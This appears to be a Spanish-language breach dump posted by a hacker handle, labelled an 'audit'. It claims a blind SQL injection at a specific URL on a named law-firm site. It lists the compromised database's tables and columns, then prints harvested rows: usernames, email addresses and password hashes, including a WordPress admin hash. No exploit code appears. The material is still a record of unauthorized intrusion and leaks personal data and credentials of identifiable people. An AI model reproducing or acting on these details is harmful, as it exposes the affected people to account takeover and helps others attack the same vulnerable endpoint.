Auditoría #2

Dirección URL: http://cdp.legal/noticia.php?id=2
Tipo de vulnerabilidad: Blind/SQL Inyección
PayLoad/PoC/Exploit: None
Hacker/Cracker/Coder: nfajmibhcg

Dumpeado de datos confidenciales:

Bases de datos disponibles en el servidor comprometido
[*] information_schema
[*] worldgr3_cdpdb
Tablas de la base de datos worldgr3_cdpdb
+-------------------------+
| section                 |
| areaspractica           |
| b_wp_commentmeta        |
| b_wp_comments           |
| b_wp_links              |
| b_wp_options            |
| b_wp_postmeta           |
| b_wp_posts              |
| b_wp_term_relationships |
| b_wp_term_taxonomy      |
| b_wp_termmeta           |
| b_wp_terms              |
| b_wp_usermeta           |
| b_wp_users              |
| b_wp_wpgdprc_consents   |
| b_wp_wpgdprc_log        |
| banner                  |
| bannerhome              |
| colaborador             |
| colaboradordetalle      |
| contacto                |
| docs                    |
| doctipos                |
| inicio                  |
| lafirma                 |
| lenguaje                |
| noticias                |
| opcion                  |
| opciontipo              |
| page                    |
| politicadecalidad       |
| servicio                |
| users                   |
| usuario                 |
+-------------------------+
Columnas de la tabla contacto de la base de datos comprometida
+---------+------------------+
| Column  | Type             |
+---------+------------------+
| apdo    | varchar(255)     |
| codleng | int(10) unsigned |
| corr    | varchar(45)      |
| dire    | varchar(255)     |
| fax     | varchar(45)      |
| tele    | varchar(45)      |
+---------+------------------+
Datos obtenidos al explotar la vulnerabilidad SQL de la página web del servidor comprometido
4|kylie.jefferson@bigmir.net|127.0.0.1
5|jenny.preston@bigmir.net|127.0.0.1
6|info@mail.loc|127.0.0.1
1|world|73b0472d43069103642ffa07997ff20a|renanmolina@world.co.cr
2|vfernandez|d7a117b6506c28f799f36a91eec20d51|vfernan@world.co.cr
3|mlechandi|a5ab1cf069c057825bdacc7ab687f538|mlechandi@cdp.co.cr
4|amilano|8466a9edd08a52c12d9e79d5b49c9f7f|amilano@cdp.legal
1|cdplegalusrn|$P$Bx.Cp4awyrM0JsoTVrrQiKCkXtacsN0|gaston.garcia@gmail.com

By nfajmibhcg